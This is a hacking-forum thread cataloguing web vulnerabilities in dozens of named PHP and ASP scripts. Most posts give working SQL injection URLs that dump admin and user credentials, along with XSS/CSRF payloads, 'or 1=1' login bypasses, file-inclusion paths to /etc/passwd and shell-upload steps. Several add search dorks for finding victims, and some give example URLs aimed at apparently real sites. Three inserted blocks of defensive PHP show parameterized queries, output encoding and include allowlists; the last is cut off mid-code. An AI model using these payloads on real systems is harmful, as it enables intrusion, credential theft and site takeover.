Encyclopedia of Vulnerable Scripts

Discussion in 'Web Vulnerabilities' started by DIAgen, 1 Jun 2006.

  1. OptimaPrime

    PRO-search

    XSS:
    Vulnerabilities in the parameters prot, host, path, name, ext, size, search_days, show_page

    Code:
    http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
  2. ~!DoK_tOR!~

    Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Code:
    listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*
    http://milw0rm.com/exploits/6298

    Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Code:
    index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Code:
    index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Dork:

    made by matterdaddy

    http://milw0rm.com/exploits/6297

    (c)~!Dok_tOR!~
     
  3. ~!DoK_tOR!~

    iFdate <= 2.0.3 Remote SQL Injection Vulnerability

    Condition: magic_quotes_gpc = Off

    http://localhost/[installdir]/members_search.php

    Search Name/Nickname

    Exploit 1:

    Code:
    ' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
    Exploit 2:

    Code:
    ' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
    http://milw0rm.com/exploits/6315
    (c) ~!Dok_tOR!~
     
  4. ~!DoK_tOR!~

    Battle Scrypt SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 26.08.08
    Product: Battle Scrypt
    Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Code:
    http://localhost/[installdir]/search.php
    Model Name:

    Exploit:

    Code:
    ' union select 1,user(),3/*
    Code:
    http://localhost/[installdir]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*

    Big Fat Rate My Photo AdSense Website SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 29.08.08
    Product: Big Fat Rate My Photo AdSense Website
    Price: $14.99
    URL: www.dotcomallsorts.com
    Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website.rar
    Vulnerability Class: SQL Injection

    Exploit 1:

    Code:
    http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
    Admin panel:

    Code:
    http://localhost/[installdir]/admin/

    Article Publisher Pro <= v1.5 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Article Publisher Pro v1.5
    Price: $75
    URL: www.phparticlescript.com
    Vulnerability Class: SQL Injection

    Exploit 1:

    Code:
    http://localhost/[installdir]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
    Dork:

    All rights reserverd © Your Articles Pro 2002-2005
    Copyright 2006 - 2008, Article Publisher PRO v1.5


    Keepsakes SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 28.08.08
    Product: Keepsakes
    Price: $25
    URL: harlandscripts.com
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
    Opera -> Source(Ctrl+F3)

    Exploit 2:

    Code:
    http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
    Opera -> Source(Ctrl+F3)

    Exploit 3:

    Code:
    http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
    Opera -> Source(Ctrl+F3)

    Exploit 4:

    Code:
    http://localhost/[installdir]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Exploit 5:

    Code:
    http://localhost/[installdir]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Admin panel:

    Code:
    http://localhost/[installdir]/admin/
    Dork:

    Copyright Your Keepsakes ® ™ 2007


    Smart Traffic 6 in 1 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Smart Traffic 6 in 1
    Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit:

    Code:
    http://localhost/[installdir]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*

    TopCoolive SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: TopCoolive
    URL: www.vetton.ru
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[installdir]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 3:

    Code:
    http://localhost/[installdir]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*

    Warez Script (by Mikel Dean) SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 27.08.08
    Product: Warez Script
    Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[installdir]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
    Code:
    http://localhost/[installdir]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
    Admin Authentication Bypass

    Code:
    http://localhost/[installdir]/v2/login.php
    User: 1' or 1=1/*
    Pass: 1' or 1=1/*

    (c) ~!Dok_tOR!~
     
    #64 ~!DoK_tOR!~, 12 Sep 2008
    Last edited: 19 Sep 2008
  5. Ded MustD!e

    An exploit for E-Php CMS (http://milw0rm.com/exploits/6483), from the developer www.ephpscripts.com, was posted on milw0rm, so I decided to check the rest of their projects for vulnerabilities (the table and column names were not given; they are the same in all the scripts).

    E-Php B2B Trading Marketplace Script (listings.php cid) Remote SQL Injection Vulnerability

    Exploit: http://www.site.com/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/*

    Example:
    http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/*



    E-Php Shop Script (search_results.php cid) Remote SQL Injection Vulnerability

    Exploit:
    http://www.site.com/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpb2b_admin/*

    Example:
    http://www.ephpscripts.com/demo/yng_wineshop/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpscri_b2badeel.ephpb2b_admin/*
     
  6. balt

    Fundlink
    SQL:

    Code:
    site.com/showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
    PHP-Newsletter
    SQL:
    Code:
    site/index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

    Com Endeavors

    SQL:
    Code:
    site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,
    concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2
    /**/from/**/admin/*where,limit,2--

    niccell

    SQL:
    Code:
    site.com/list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,
    concat(login,0x3a,password),444+from+admin_login/*
    KwsPHP
    SQL:
    Code:
    site.com/index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*
    Esy
    SQL:
    Code:
    site.com/sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
    Code:
    site.com/ sections.php?op=printpage&artid=-9999999/**
    /union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
    BosClassifieds Classified Ads System
    SQL:
    Code:
    site.com/bosclassifieds/index.php?cat=[SQL]
    pollBooth

    SQL:
    Code:
    site.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
    
    RS MAXSOFT
    SQL:
    Code:
    site.com/modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
    
    SSWD
    SQL:
    Code:
    site.com/index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*
    OpenLD
    SQL:
    Code:
    site.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null  ,null,null,null,null/**/FROM/**/settings--
    

    Site Sift

    SQL:
    Code:
    site.com/ndex.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
    
    Code:
    site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,
    10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
    

    Showlink

    SQL:
    Code:
    site.com/index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
    

    eSyndiCat

    SQL:
    Code:
    site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
    Bwired

    SQL: i
    Code:
    site.com/ndex.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
    

    Md-Pro

    SQL:
    Code:
    site.com/index.php?module=Topics&func=
    view&topicid=-1 UNION ALL SELECT null,null,concat
    (pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

    eMeeting Online Dating Software

    SQL:
    Code:
    site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
    Code:
    site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*
    FlashGameScript
    SQL:
    Code:
    site.com/index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+
    from+members+where+user_type=2/*
    Code:
    site.com/index.php?func=member&user='+union+select+0,0,0,0,
    0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr
     om+members+where+user_type=2/*
     
  7. Dimi4

    Author: Dimi4
    Date found: 30.10.08
    Product: Image Hosting System v1.3.4
    Price: n\q
    URL: www.webmastersadvantage.com (http://www.1phpscripts.com/Image_Hosting_System_Script.html)
    Vulnerability Class: XSS
    Vulnerability Script:viewimage.php
    PHP:
    <?
    $file = $_GET['file'];
    if ($file == "") {
        header("Location: " . $server_url);
        exit;
    }
    .....

    <img src="<?= $file ?>
    Hmm.. I realized all of this was pointless... The admin panel is open ;)
    Default path:/imageadmin/

     
    2 people like this.
  8. iddqd

    CMS Made Simple 1.4.1, possibly older versions too.

    Active XSS in the admin panel.
    Vulnerable parameter: the name of a new category when it is added in Content -> News -> Categories (Field Definitions names are also vulnerable).

    To "make" the admin inject our code into the name, a CSRF attack has to be carried out. The data is sent via POST, but it can also be sent via GET.

    Build the link:
    Code:
    http://[path_to_CMS_directory]/admin/moduleinterface.php?mact=News,m1_,addcategory,0&m1_name=[XSS]
    It is better to load it in a frame. :rolleyes:

    The XSS will be available on the page:
    Code:
    http://[path_to_CMS_directory]/admin/moduleinterface.php?module=News
    (c) iddqd

    Ass-backwards, of course, but still ;)
     
    5 people like this.
  9. Smapt

    StrawBerry 1.1.1 (formerly CuteNews)

    Include for the version with TXT databases:
    Code:
    http://localhost/example/index.php?do=../../../../db/base/users.MYD%00

    An include of this kind is present in all TXT versions of StrawBerry and CuteNews

    Shell upload:
    Admin panel->Settings->Image management
    rename the shell to .jpg and upload it to the server.
    Click "rename", change the extension back to php, and get a shell. For StrawBerry 1.1.1, since access to the upload folder is denied, rename it to "../../shell.php" and get _ttp://localhost/shell.php
     
  10. Ded MustD!e

    Active Business Directory v 2 (Auth Bypass) SQL Injection Vulnerability

    script: Active Business Directory v 2
    found: Ded MustD!e

    exploit: http://www.activewebsoftwares.com/demoactivebusinessdirectory/account.asp

    E-mail Address: ' or ' 1=1
    Password: ' or ' 1=1

    ASPReferral v 5.3 (Auth Bypass) SQL Injection Vulnerability

    script: ASPReferral v 5.3
    found: Ded MustD!e

    exploit: http://www.activewebsoftwares.com/demoaspreferral/Merchant.asp

    E-mail Address: ' or ' 1=1--
    Password: ' or ' 1=1--
     
    1 person likes this.
  11. Qwazar

    ExpressionEngine Core v. 1.6.6, and apparently other versions and modifications too (they say it is popular abroad)

    Hashing algorithm: sha1(pass) by default, or md5(pass).

    XSS (By the way, this script can be used to send an email to anyone from the vulnerable server, with the blog owner's return address):
    Code:
    POST: http://test1.ru/system/utilities/email_test.php 
    recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script>
    
    If install.php has not been removed:
    LFI:
    Code:
    http://test1.ru/install.php?page=4
    system_dir=system&ext=/../../1.php
    //If system_dir is not system (the default), change it to the actual value.
    
    LFI:
    Code:
    http://test1.ru/install.php?page=5
    ext=/../../1.php
    
    LFI:
    Code:
    http://test1.ru/install.php?page=6
    ext=/../../1.php
    LFI:
    Code:
    http://test1.ru/install.php?page=7
    rebuild_config=1&ext=/../../1.php
    
    Path disclosure:
    Code:
    http://test1.ru/system/utilities/admin.php
    http://test1.ru/system/utilities/dbtest.php
    Path disclosure (with register_globals=ON):
    Code:
    http://test1.ru/system/update.php?conf=1
    Disclosure of user information, the DB table prefix, users' IP addresses (and more):

    The folders are not hidden by .htaccess; in the wild, interesting information can be found in db_cache:
    Code:
    /system/cache/sql_cache/
    /system/cache/db_cache/
    /system/cache/magpie_cache/
    /system/cache/page_cache/
    /system/cache/tag_cache/
    
    For example: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (user information: login, email, etc.)

    dork: "powered by ExpressionEngine" (by the way, there really are quite a lot)
     
    #71 Qwazar, 7 Dec 2008
    Last edited: 7 Dec 2008
    3 people like this.
  12. OptimaPrime

    Energine

    I'll drop this here, because I've gone blind and can't see the "Vulnerabilities of free CMSs" thread

    SQL Inj:


    Code:
    site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
    XSS:

    In the search field:
    Code:
    "><script>alert()</script>  
     
    1 person likes this.
  13. 0nep@t0p

    CMS: [ ACMS™ ]

    Developer: [ http://www.acalog.com/ ]

    Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ]

    Bug type: [ Blind Sql Injection ]

    Bug: [ coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ]

    Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ]


    Notably, most of the sites running the buggy CMS are in the .edu domain zone
     
  14. Dimi4

    FAQMasterFlex vulnerabilities

    [FAQMasterFlex vulnerabilities]
    Condition: magic_quotes_gpc = OFF
    1.
    File:faq.php
    Vulnerable piece of code:

    PHP:
     $result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error());
    SQL injection:

    Code:
    http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*
    2.
    File:faq_admin.php
    Vulnerable piece of code:

    PHP:
     $result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error());
    SQL injection:

    Code:
    http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*&cat_name=
    Google dork:"Powered by Lethal Penguin."

    http://www.lethalpenguin.net/design/faqmasterflex.php?download=true
     
    2 people like this.
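
Added example, not code from the post or from the FAQMasterFlex project: the quoted `category_id` lookup written once with string concatenation and once with a bound parameter, run through PDO against a constructed in-memory SQLite table. The table contents, the function names and the tautology input are assumptions made for the demonstration; `magic_quotes_gpc` was removed in PHP 5.4, so the bound parameter is what carries the fix.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the faqs table; the real schema is not shown on the page.
function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE faqs (id INTEGER PRIMARY KEY, category_id INTEGER, question TEXT)');
    $db->exec("INSERT INTO faqs (category_id, question) VALUES
        (1, 'How do I add a FAQ?'),
        (1, 'How do I edit a FAQ?'),
        (2, 'Entry from another category')");
    return $db;
}

// Same shape as the quoted faq.php line: the request value becomes part of the SQL text.
function faqs_concatenated(PDO $db, string $categoryId): array
{
    $sql = "SELECT question FROM faqs WHERE category_id = '$categoryId'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed SQL text; the value is sent as a bound parameter and is never parsed as SQL.
function faqs_bound(PDO $db, string $categoryId): array
{
    $stmt = $db->prepare('SELECT question FROM faqs WHERE category_id = :cid');
    $stmt->execute([':cid' => $categoryId]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Second layer: category_id is an integer key, so anything else is rejected up front.
function parse_category_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

$db = make_db();
// Constructed inputs: a normal id and a quote-breaking tautology.
foreach (['1', "1' OR '1'='1"] as $raw) {
    printf(
        "%-14s concatenated=%d  bound=%d  validated=%s\n",
        $raw,
        count(faqs_concatenated($db, $raw)),
        count(faqs_bound($db, $raw)),
        var_export(parse_category_id($raw), true)
    );
}
```

With the second input the concatenated query returns every row in the table, the bound query returns none, and the integer check rejects the value before any query runs.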
  15. iddqd

    Textpattern v.4.0.3

    Passive XSS
    Code:
    http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=</textarea><script>alert(document.cookie)</script>&alt=&h=1&w=400&type=textile
    Code:
    http://localhost/textpattern/index.php?event=log&step=list&page=1<script>alert(document.cookie)</script>
    Active XSS
    Write a new article => http://localhost/textpattern/index.php?event=article => insert the code into the title
    Code:
    <script>alert()</script> or </title><script>alert()</script>
    Categories => the "Name" field is vulnerable.

    Files => the "Description" field.

    Links => the "Title" and "Description" fields.

    (c) iddqd
     
    #75 iddqd, 14 Dec 2008
    Last edited: 15 Dec 2008
    2 people like this.
  16. Qwazar

    MODx 0.9.6.2

    Passive XSS
    Code:
    /assets/modules/docmanager/includes/tv.ajax.php
    POST: tplID=-1&langNoTV=<body onLoad=alert('ok')>
    Code:
    /assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script>
    register_globals ON
    Code:
    /assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script>
    register_globals ON

    What is funny in this case is that the XSS is in the parameter name, while the value is filtered strictly.

    Path disclosures
    Code:
    assets/cache/siteCache.idx.php
    
    manager/includes/rss.inc.php
    manager/includes/browsercheck.inc.php
    manager/includes/sniff/phpSniff.class.php
    manager/includes/extenders/getUserData.extender.php
    
    assets/snippets/ditto/formats/xml.format.inc.php
    assets/snippets/ditto/formats/rss.format.inc.php
    assets/snippets/ditto/formats/json.format.inc.php
    assets/snippets/ditto/classes/debug.class.inc.php
    assets/snippets/ditto/formats/atom.format.inc.php
    assets/snippets/ditto/extenders/tagging.extender.inc.php
    
    manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php
    
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php
     
    1 person likes this.
  17. OptimaPrime

    bbpress

    bbpress v1.0


    File:
    realplay.php

    Vulnerable piece of code:

    Code:
    <?php
    echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
    ?>
    XSS injection:

    Code:
    http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E


    Active XSS:

    In /inc/realplay.php, enter in the email field:

    Code:
    <script>alert()</script>
     
    #77 OptimaPrime, 20 Dec 2008
    Last edited: 20 Dec 2008
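
Added example, not code from the post or from any project named in this thread: the output side of the reflected values discussed above (`link` echoed by realplay.php, and the `">` and `'>` attribute break-outs in the first post), with encoding for quoted attributes and a scheme check for values used as URLs. The function names and sample inputs are constructed for the illustration.

```php
<?php
declare(strict_types=1);

// HTML-encode for element content and quoted attribute values.
// ENT_QUOTES also encodes ' so a single-quoted attribute cannot be closed.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encoding alone does not make a value safe as a URL: a javascript: URL contains
// nothing that needs encoding. Accept only absolute http(s) URLs, else return null.
function safe_http_url(string $raw): ?string
{
    $url = filter_var(trim($raw), FILTER_VALIDATE_URL);
    if ($url === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// A link rendered from a request value: validated as a URL, then encoded on output.
// Whatever passes the URL check is still encoded before it reaches the page.
function render_link(string $rawLink): string
{
    $url = safe_http_url($rawLink);
    if ($url === null) {
        return '<p>Invalid link</p>';
    }
    return '<a href="' . h($url) . '">' . h($url) . '</a>';
}

// A form field that echoes the submitted value inside a single-quoted attribute.
function render_field(string $raw): string
{
    return "<input type='text' name='show_page' value='" . h($raw) . "'>";
}

// Constructed inputs, modelled on the request values quoted in this thread.
$links = [
    'http://example.com/clip.rm?a=1&b=2',
    '"><script>alert(document.cookie)</script>',
    'javascript:alert(document.cookie)',
    'http://example.com/"><script>alert(document.cookie)</script>',
];
foreach ($links as $raw) {
    echo render_link($raw), "\n";
}
echo render_field("'><script>alert(document.cookie)</script>"), "\n";
```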
  18. OptimaPrime

    WorkingOnWeb

    File: admin.inc.php

    Vulnerable piece of code:

    Code:
    $user = "";
    $pass = "";
    if (isset($_POST['loginname']) && $_POST['loginname'] != "")
    $user = $_POST['loginname'];
    if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
    $pass = $_POST['loginpass'];
    $loggedin = $this->loginuser($user, $pass);
    

    SQL injection:

    Code:
    http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
    

    XSS injection:

    Code:
    http://path/wow/index.php/"><script>alert(document.cookie)</script>
    
     
  19. OptimaPrime

    iGaming CMS


    File: lang.php
    Vulnerable code:
    Code:
    if(isset($_GET['lang']))
    {
        $include_lang = $_GET['lang'];
    }
    elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
    {
        include_once(TOP_DIR.'/functions/db_api.php');
        $include_lang = get_language();
    }
    else
    {
        $include_lang = get_http_accept_lang();
    }
    include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
    
    Code:
    http://path/docs/index.php?lang=/../../../../../../../../../../test
    
    If magic_quotes_gpc = Off, then:

    Code:
    http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
    
    File: install.php


    Vulnerable code:

    Code:
    switch($_GET['whatlang'])
    {
    case 1:
        include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
        break;
    
        default:
        include_once(TOP_DIR.'/lang/lang.English.php');
        break;
    }
    Code:
    http://path/install.php?whatlang=1&language=/../../../../../../../test
    
    If magic_quotes_gpc = Off, then:

    Code:
    http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00
    SQL injection:

    Code:
    http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
    XSS injection:
    Code:
    http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
     
    #79 OptimaPrime, 21 Dec 2008
    Last edited: 22 Dec 2008
  20. OptimaPrime

    Wheatblog


    File: main.php
    Piece of vulnerable code:
    Code:
    $config = ereg_replace(":","", $config);
    
    $config = trim(ereg_replace("../","", $config));
    
    $config = trim(ereg_replace("/","", $config));
    
    if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
    
    Code:
    http://path/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
    
    If magic_quotes_gpc = ON, then:
    Code:
    http://path/main.php?config=eregi.inc.php\..\admin\.htaccess
    
    XSS injection:

    Code:
    http://path/index.php?action=category&id=<script>alert(document.cookie)</script>
    
     
    1 person likes this.
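
Added example, not code from iGaming CMS or Wheatblog: one resolver for the include patterns in the two posts above (`lang.<name>.php` in lang.php and install.php, `<name>.inc.php` in main.php) that looks the requested name up in a list of files that actually exist instead of filtering the request string. The function names, the demo directory and its files are assumptions constructed for the illustration.

```php
<?php
declare(strict_types=1);

// Build the allowlist from files present in $dir: "lang.English.php" -> "English".
// Only names made of letters, digits and underscores are ever listed.
function allowed_files(string $dir, string $prefix, string $suffix): array
{
    $pattern = '/^' . preg_quote($prefix, '/') . '([A-Za-z0-9_]{1,32})'
             . preg_quote($suffix, '/') . '$/';
    $known = [];
    foreach (glob($dir . '/' . $prefix . '*' . $suffix) ?: [] as $file) {
        if (preg_match($pattern, basename($file), $m)) {
            $known[$m[1]] = $file;
        }
    }
    return $known;
}

// Map the requested name to a listed file, or fall back to the default.
// The request value is only ever used as an array key, never as part of a path.
function resolve_include(?string $requested, string $dir, string $prefix,
                         string $suffix, string $default): string
{
    $known = allowed_files($dir, $prefix, $suffix);
    if (!isset($known[$default])) {
        throw new RuntimeException('default file is missing from ' . $dir);
    }
    if (is_string($requested) && isset($known[$requested])) {
        return $known[$requested];
    }
    return $known[$default];
}

// Constructed demo tree; the file names follow the two posts' include patterns.
$dir = sys_get_temp_dir() . '/include_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
foreach (['lang.English.php', 'lang.German.php', 'config.inc.php'] as $f) {
    file_put_contents("$dir/$f", "<?php\n");
}

// Constructed request values: one valid name, then the shapes quoted in the posts.
$cases = [
    ['German', 'lang.', '.php', 'English'],
    ["/../../../../etc/passwd\0", 'lang.', '.php', 'English'],
    ['eregi.inc.php\\..\\admin\\.htaccess', '', '.inc.php', 'config'],
    [null, '', '.inc.php', 'config'],
];
foreach ($cases as [$req, $prefix, $suffix, $default]) {
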